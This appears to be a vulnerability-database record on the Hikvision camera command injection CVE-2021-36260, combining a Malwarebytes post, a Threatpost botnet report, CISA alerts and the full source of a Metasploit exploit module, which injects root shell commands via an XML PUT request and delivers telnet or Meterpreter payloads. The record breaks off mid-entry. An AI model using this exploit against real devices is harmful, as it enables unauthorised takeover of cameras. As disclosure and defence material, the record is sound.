{"malwarebytes": [{"lastseen": "2021-09-22T15:04:28", "description": "In a detailed [post on GitHub](<https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html>), security researcher Watchful_IP describes how he found that the majority of recent Hikvision camera product ranges are susceptible to a critical, unauthenticated, remote code execution (RCE) vulnerability, even on the latest firmware.\n\n### Hikvision\n\nHangzhou Hikvision Digital Technology Co., Ltd. develops, produces, and sells security products. Its product lines include hard disk recorders, video codecs, video servers, surveillance cameras, speed dome (PTZ) cameras, road mounts and other products, as well as security services. The company was founded on November 30, 2001 and is headquartered in Hangzhou, China.\n\nAccording to global market data provider IHS Markit, Hikvision has 38% of the global market share and has been the market leader since 2011. Hikvision is also known for its research on technologies such as visual recognition and cloud computing, and their adoption in security scenarios.\n\n### The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). 
The vulnerability found by Watchful_IP is listed under [CVE-2021-36260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36260>) and could allow an unauthenticated attacker to gain full access to the device and possibly perform lateral movement into internal networks.\n\nThe critical bug has received 9.8 out of 10 on the [CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) scale of severity. The score is justified by the fact that the attacker ends up with more access than the device owner has: the owner is confined to a limited protected shell (psh) that filters input down to a predefined set of mostly informational commands, whereas the injected commands run unrestricted as root.\n\nAccording to the researcher, the vulnerability has existed at least since 2016. All an attacker needs is network access to the HTTP(S) server port (typically 80/443). No username or password is needed, no action is required from the camera owner, and the attack is not recorded by any logging on the camera itself. A threat actor exploits the vulnerability by sending a request containing a specially crafted command, which the camera then executes (a command injection).\n\n### Affected products\n\nUsers can find a list of affected products in the [security notification](<https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/>) from Hikvision. Among them are IP cameras and PTZ cameras. PTZ is short for Pan/Tilt/Zoom, the name used for cameras that can be remotely controlled and pointed. 
These cameras can be, and often are, used in a patrol mode, covering an area by moving between preset points; the footage is usually recorded so it can be reviewed later.\n\nUsers of other brands should also be aware that a huge number of OEM resellers offer Hikvision cameras under their own model numbers, so a vulnerable camera need not carry the Hikvision name.\n\n### Responsible disclosure\n\nThe researcher has not disclosed any specifics about the attack, to protect potential victims. In his post he describes how he worked with Hikvision since the discovery on Sunday June 20, 2021. He was extremely pleased that they took him seriously and involved him in taking care of the problem.\n\nOn August 17, Watchful_IP received the patched IPC_G3 (V5.5.800 build 210628) and IPC H5 (V5.5.800 build 210628) firmware from HSRC (the Hikvision Security Response Center) for testing.\n\n> \u201cDecrypted and reversed the code in addition to live testing on my own equipment and confirmed to HSRC that the patched firmware resolves the vulnerability.\n> \n> Was further pleased to note this problem was fixed in the way I recommended.\u201d\n\nWe are glad that researchers like this check the security of the products we use and practice responsible disclosure when they find problems, so manufacturers can resolve matters before cybercriminals start using our security equipment against us.\n\n### Mitigation\n\nA word of caution is needed here, since not all of the firmware portals have been provided with the latest firmware that is patched against this attack. To be sure of getting a patched version, Hikvision recommends downloading the latest firmware for your device from the [global firmware portal](<https://www.hikvision.com/en/support/download/firmware/>). The researcher notes, however, that at the time of writing updated firmware appears to be properly deployed on the Hikvision China-region firmware portal for Chinese-region devices, but only partially on the global site. 
If you are in doubt, there is a list of the [vulnerable firmware versions in the researcher's post](<https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html#affected-firmware-types>).\n\nIn general it is a good idea not to make your cameras reachable from the internet; if you must, put them behind a VPN so that the camera's HTTP(S) port is never exposed directly.\n\nThe post [Patch now! Insecure Hikvision security cameras can be taken over remotely](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-insecure-hikvision-security-cameras-can-be-taken-over-remotely/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T12:19:40", "type": "malwarebytes", "title": "Patch now! Insecure Hikvision security cameras can be taken over remotely", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-36260"], "modified": "2021-09-22T12:19:40", "id": "MALWAREBYTES:7DC590D7CCD7B42E23F1F1008D339A41", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-insecure-hikvision-security-cameras-can-be-taken-over-remotely/", "cvss": {"score": 0.0, "vector": "NONE"}}], "metasploit": [{"lastseen": "2022-06-24T08:36:49", "description": "This module exploits an unauthenticated command injection in a variety of Hikvision IP cameras (CVE-2021-36260). The module inserts a command into an XML payload used with an HTTP PUT request sent to the `/SDK/webLanguage` endpoint, resulting in command execution as the `root` user. This module specifically attempts to exploit the blind variant of the attack. The module was successfully tested against an HWI-B120-D/W using firmware V5.5.101 build 200408. It was also tested against an unaffected DS-2CD2142FWD-I using firmware V5.5.0 build 170725. 
Please see the Hikvision advisory for a full list of affected products.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-19T21:13:24", "type": "metasploit", "title": "Hikvision IP Camera Unauthenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-02-25T16:32:06", "id": "MSF:EXPLOIT-LINUX-HTTP-HIKVISION_CVE_2021_36260_BLIND-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/hikvision_cve_2021_36260_blind/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Hikvision IP Camera Unauthenticated Command Injection',\n 'Description' => %q{\n This module exploits an unauthenticated command injection in a variety of 
Hikvision IP\n cameras (CVE-2021-36260). The module inserts a command into an XML payload used with an\n HTTP PUT request sent to the `/SDK/webLanguage` endpoint, resulting in command execution\n as the `root` user.\n\n This module specifically attempts to exploit the blind variant of the attack. The module\n was successfully tested against an HWI-B120-D/W using firmware V5.5.101 build 200408. It\n was also tested against an unaffected DS-2CD2142FWD-I using firmware V5.5.0 build 170725.\n Please see the Hikvision advisory for a full list of affected products.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Watchful_IP', # Vulnerability discovery and disclosure\n 'bashis', # Proof of concept\n 'jbaines-r7' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-36260' ],\n [ 'URL', 'https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html'],\n [ 'URL', 'https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/security-notification-command-injection-vulnerability-in-some-hikvision-products/'],\n [ 'URL', 'https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py']\n ],\n 'DisclosureDate' => '2021-09-18',\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_ARMLE],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n # the target has very limited payload targets and a tight payload space.\n # bind_busybox_telnetd might be *the only* one.\n 'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd',\n # saving four bytes of payload space by using 'sh' instead of '/bin/sh'\n 'LOGIN_CMD' => 'sh',\n 'Space' => 23\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_ARMLE],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'printf', 'echo' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 
'linux/armle/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 80,\n 'SSL' => false,\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n # Check will test two things:\n # 1. Is the endpoint a Hikvision camera?\n # 2. Does the endpoint respond as expected to exploitation? This module is\n # specifically testing for the blind variant of this attack so we key off\n # of the returned HTTP status code. The developer's test target responded\n # to exploitation with a 500. Notes from bashis' exploit indicates that\n # they saw targets respond with 200 as well, so we'll accept that also.\n def check\n # Hikvision landing page redirects to '/doc/page/login.asp' via JavaScript:\n # <script>\n # window.location.href = \"/doc/page/login.asp?_\" + (new Date()).getTime();\n # </script>\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/')\n })\n return CheckCode::Unknown(\"Didn't receive a response from the target.\") unless res\n return CheckCode::Safe('The target did not respond with a 200 OK') unless res.code == 200\n return CheckCode::Safe('The target doesn\\'t appear to be a Hikvision device') unless res.body.include?('/doc/page/login.asp?_')\n\n payload = '<xml><language>$(cat /proc/cpuinfo)</language></xml>'\n res = send_request_cgi({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),\n 'data' => payload\n })\n\n return CheckCode::Unknown(\"Didn't receive a response from the target.\") unless res\n return CheckCode::Safe('The target did not respond with a 200 OK or 500 error') unless (res.code == 200 || res.code == 500)\n\n # Some cameras are not vulnerable and still respond 500. 
We can weed them out by making\n # the remote target sleep and use a low timeout. This might not be good for high latency targets\n # or for people using Metasploit as a vulnerability scanner... but it's better than flagging all\n # 500 responses as vulnerable.\n payload = '<xml><language>$(sleep 20)</language></xml>'\n res = send_request_cgi({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),\n 'data' => payload\n }, 10)\n\n return CheckCode::Appears('It appears the target executed the provided sleep command.') unless res\n\n CheckCode::Safe('The target did not execute the provided sleep command.')\n end\n\n def execute_command(cmd, _opts = {})\n # The injection space is very small. The entire snprintf is 0x1f bytes and the\n # format string is:\n #\n # /dav/%s.tar.gz\n #\n # Which accounts for 12 bytes, leaving only 19 bytes for our payload. Fortunately,\n # snprintf will let us reclaim '.tar.gz' so in reality, there are 26 bytes for\n # our payload. We need 3 bytes to invoke our injection: $(). Leaving 23 bytes\n # for payload. The 'echo' stager has a minimum of 26 bytes but we obviously don't\n # have that much space. We can steal the extra space from the \"random\" file name\n # and compress ' >> ' to '>>'. That will get us below 23. 
Squeezing the extra\n # bytes will also allow printf stager to do more than 1 byte per exploitation.\n cmd = cmd.gsub(%r{tmp/[0-9a-zA-Z]+}, @fname)\n cmd = cmd.gsub(/ >/, '>')\n cmd = cmd.gsub(/> /, '>')\n\n payload = \"<xml><language>$(#{cmd})</language></xml>\"\n res = send_request_cgi({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),\n 'data' => payload\n })\n\n fail_with(Failure::Disconnected, 'Connection failed') unless res\n fail_with(Failure::UnexpectedReply, \"HTTP status code is not 200 or 500: #{res.code}\") unless (res.code == 200 || res.code == 500)\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n # generate a random value for the tmp file name. See execute_command for details\n @fname = \"tmp/#{Rex::Text.rand_text_alpha(1)}\"\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n # 26 is technically a lie. See `execute_command` for additional insight\n execute_cmdstager(linemax: 26)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/hikvision_cve_2021_36260_blind.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-12-08T20:23:10", "description": "Although a patch was released in September, any still-vulnerable Hikvision IP Network Video Recorder (NVR) products are being actively targeted by the Mirai-based botnet [known](<https://threatpost.com/mootbot-fiber-routers-zero-days/154962/>) as Moobot.\n\nFortiGuard Labs has released a report detailing how the Moobot botnet is leveraging a known [remote code execution (RCE) vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36260>) in Hikvision products (CVE-2021-36260) to spread a Moobot, which carries out distributed denial of service (DDoS) attacks.\n\nThe attack surface could be significant: China-based Hikvision touted itself as 
the \u201cworld\u2019s leading [video-surveillance products supplier](<https://us.hikvision.com/en/about/hikvision-global>)\u201d on the company site.\n\nOnce the attacker finds a vulnerable system, a downloader drops the malware, which FortiGuard identified as Moobot, a variant of Mirai with traces of Satori code. Satori is another [Mirai-based botnet](<https://threatpost.com/mirai-botnet-sees-big-2019-growth-shifts-focus-to-enterprises/146547/>) and one of dozens that have been spun off the original source code.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/08145818/moobot-attack-scenario.png>)\n\nAttack scenario. Source: FortiGuard Labs.\n\n\u201cIts most obvious feature is that it contains the data string \u201cw5q6he3dbrsgmclkiu4to18npavj702f\u201d, which is used in the \u201crand_alphastr\u201d function,\u201d the researchers found in analyzing the binary. \u201cIt is used to create random alphanumeric strings with different purposes, such as for a setup process name or to generate data for attacking.\u201d\n\nOnce it makes a connection with the command-and-control server (C2), it launches the DDoS attack, the report added, which looks like this:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/08145852/moobot-ddos-attack.png>)\n\nSource: FortiGuard Labs.\n\n## **Tracked to DDoS Service Provider**\n\nThe analysts were able to track the code to a DDoS service provider\u2019s Telegram channel called \u201ctianrian,\u201d which has been operating since August, they added.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/08145920/moobot-service-provider-telegram-chat.png>)\n\nSource: FortiGuard Labs.\n\n\u201cFrom the chatting channel we can see that the service is still updating,\u201d FortiGuard\u2019s report cautioned. 
\u201cUsers should always look out for DDoS attacks and apply patches to vulnerable devices.\u201d\n\nDuring Q3, threat researchers at Kaspersky found that the number of [DDoS attacks shattered records](<https://threatpost.com/ddos-attacks-records-q3/176082/>), often topping thousands per day.\n\nLinux-based Mirai was first identified in September of 2016 when it was used in a DDoS attack [against Krebs on Security](<https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/>). A month later it took out a vast swath of the internet with [a hit on Dyn](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>). And despite its source code [being released](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) in October 2016, it has since become one of the most [powerful internet of things botnets](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>), infecting products and gadgets from brands including D-Link, SonicWall and Netgear, and other connected devices.\n\nFortinet listed [Mirai as the top botnet threat](<https://threatpost.com/attackers-will-flock-to-crypto-wallets-linux-in-2022-podcast/176546/>) in its analysis of the first half of 2021. The report\u2019s author Derek Manky, Fortiguard Labs\u2019 chief of security insights and global threat alliances doesn\u2019t expect Mirai, or its related threat variants, to go away anytime soon.\n\n\u201cWe\u2019re going to fully expect to see more of [Mirai],\u201d Manky said. \u201cMore Linux-based botnets. 
A lot of these targets, we\u2019re not talking about Windows, but MacOS, we\u2019ve already seen more and more \u2026 code written for Linux itself, and that is a majority of the [internet of things, or IoT] space.\u201d\n\nAny organizations running unpatched Hikvision systems are urged to get the [firmware update](<https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/>) provided by the company.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-08T20:13:18", "type": "threatpost", "title": "Moobot Botnet Chews Up Hikvision Surveillance Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2021-12-08T20:13:18", "id": "THREATPOST:C04C55FD250D601E0548E64B78EDE16F", "href": "https://threatpost.com/moobot-botnet-hikvision-surveillance-systems/176879/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-11-26T18:14:34", "description": "Hikvision has released updates to mitigate a command injection vulnerability\u2014CVE-2021-36260\u2014in Hikvision cameras that use a web server service. A remote attacker could exploit this vulnerability to take control of an affected device. 
\n \nCISA encourages users and administrators to review Hikvision\u2019s Security Advisory [HSRC-202109-01](<https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/security-notification-command-injection-vulnerability-in-some-hikvision-products/>) and apply the latest firmware updates. See security researcher Watchful IP\u2019s [technical blogpost](<https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html>) for more information.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/28/rce-vulnerability-hikvision-cameras-cve-2021-36260>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "cisa", "title": "RCE Vulnerability in Hikvision Cameras (CVE-2021-36260) ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, 
"impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2021-09-29T00:00:00", "id": "CISA:28C7B30B096401B3117E4D6288853BD7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/28/rce-vulnerability-hikvision-cameras-cve-2021-36260", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:29:15", "description": "CISA has added 15 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Remediation Due Date** \n---|---|--- \nCVE-2021-22017 | VMware vCenter Server Improper Access Control Vulnerability | 1/24/2022 \nCVE-2021-36260 | Hikvision Improper Input Validation Vulnerability | 1/24/2022 \nCVE-2021-27860 | FatPipe WARP, IPVPN, and MPVPN Privilege Escalation Vulnerability | 1/24/2022 \nCVE-2020-6572 | Google Chrome prior to 81.0.4044.92 Use-After-Free Vulnerability | 7/10/2022 \nCVE-2019-1458 | Microsoft Win32K Elevation of Privilege Vulnerability | 7/10/2022 \nCVE-2013-3900 | Microsoft WinVerify Trust Function Remote Code Execution Vulnerability | 7/10/2022 \nCVE-2019-2725 | Oracle WebLogic Server, Injection Vulnerability | 7/10/2022 \nCVE-2019-9670 | Synacor Zimbra Collaboration Suite Improper Restriction of XML External Entity Reference Vulnerability | 7/10/2022 \nCVE-2018-13382 | Fortinet FortiOS and FortiProxy Improper Authorization Vulnerability | 7/10/2022 \nCVE-2018-13383 | Fortinet FortiOS and FortiProxy Improper Authorization Vulnerability | 7/10/2022 \nCVE-2019-1579 | Palo Alto Networks PAN-OS Remote Code Execution Vulnerability | 7/10/2022 \nCVE-2019-10149 | Exim Mail Transfer Agent 
(MTA) Improper Input Validation Vulnerability | 7/10/2022 \nCVE-2015-7450 | IBM WebSphere Application Server and Server Hypervisor Edition Remote Code Execution Vulnerability | 7/10/2022 \nCVE-2017-1000486 | Primetek Primefaces Application Remote Code Execution Vulnerability | 7/10/2022 \nCVE-2019-7609 | Elastic Kibana Remote Code Execution Vulnerability | 7/10/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-01-10T00:00:00", "type": "cisa", "title": "CISA Adds 15 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-3900", "CVE-2015-7450", "CVE-2017-1000486", "CVE-2018-13382", "CVE-2018-13383", "CVE-2019-10149", "CVE-2019-1458", "CVE-2019-1579", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-6572", "CVE-2021-22017", "CVE-2021-27860", "CVE-2021-36260"], "modified": "2022-01-25T00:00:00", "id": "CISA:99DAB57F9B8063F8619B1A418B014DF1", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/10/cisa-adds-15-known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], 
"githubexploit": [{"lastseen": "2022-05-15T21:10:27", "description": "# CVE-2021-36260-metasploit\nthe metasploit script(POC) about CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T08:11:49", "type": "githubexploit", "title": "Exploit for Command Injection in Hikvision Ds-2Cd2026G2-Iu\\/Sl Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-05-15T18:14:09", "id": "A065A4CD-AEE7-5474-82F9-77720A53CF23", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-11T19:31:29", "description": "# CheckHKRCE\nCVE-2021-36260\n# Install \n- Python...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2021-12-13T09:23:36", "type": "githubexploit", "title": "Exploit for Command Injection in Hikvision Ds-2Cd2026G2-Iu\\/Sl Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-02-02T18:44:17", "id": "BE5B3008-561B-5C3D-B8D1-BAA49FD49FA0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-06T15:42:41", "description": "# CVE-2021-36260\nCVE-2021-36260 POC command injection vulnerabil...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T15:51:12", "type": "githubexploit", "title": "Exploit for Command Injection in Hikvision Ds-2Cd2026G2-Iu\\/Sl Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
